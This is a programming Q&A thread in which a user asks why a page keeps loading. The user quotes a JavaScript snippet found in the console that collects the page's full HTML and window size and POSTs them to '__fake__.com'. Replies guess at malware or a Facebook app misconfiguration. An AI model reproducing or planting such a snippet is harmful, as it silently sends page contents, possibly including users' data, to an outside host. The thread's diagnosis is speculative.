# Page loading takes time

Tags: javascript, jquery

My website uses ajax to fetch and display data often..Everytime a request is made , it displays data fast but keep on loading. I'm unable to click on anything else, as once the psge is fully loaded, only then I can interact with the page.

I checked the console and I would like to understand what causes the following :

[image]

As I clicked on one of the links marked in red above, I got this in the console too.I don't have any link to facebook share or like button. I would like to understand what causes this error , please.

```
(function () {     
       if (window.g_clrDimensionsSent) return;  
       window.g_clrDimensionsSent = true; 
       var data = new FormData();   
       data.append('windowWidth', window.innerWidth);  
       data.append('windowHeight', window.innerHeight); 
       data.append('headHtml', window.document.head.outerHTML);
       data.append('bodyHtml', window.document.body.outerHTML);
       var xhr = new XMLHttpRequest();  
       xhr.open('POST', document.location.protocol + '//__fake__.com');   
       xhr.send(data);                       
})()
```

Answer (score 0):

It looks like you are connecting from your local machine and not the website for which your Facebook page is set up. Have you checked the settings of your Facebook app?

Usually you should use your hosts file to rather mimmick your live url, or you must set the Canvas, Public etc URLs as "localhost" and not your live website.

As for the parts in RED, your site is making a post to "fake.com"... which is most likely malware in your browser, unless you specifically coded calls to post to that URL?

Run malware bytes to confirm, or disable all your plugins in your browser. The "VM" part means its the browser throwing the error, and not the website. Do a check to see if you also get those errors on other pages.

Comment: it makes sense, however I've removed all the connection to facebook, still how can it connect to the app?

Comment: Search your codebase for "__fake__.com" ... and post the name of the file  that's throwing it?

Comment: the other page also throwing the same error. However I don't know the filename that's throwing the fake.com error.

Comment: It sounds like you have malware on your site, which is causing the Fake.com issues. And the reason your Facebook connect isn;t working, is because of a wrong canvas URL. If you don't have Facebook connect on your site or any other Facebook stuff running on your site, then the malware is most likely trying to do something malicious.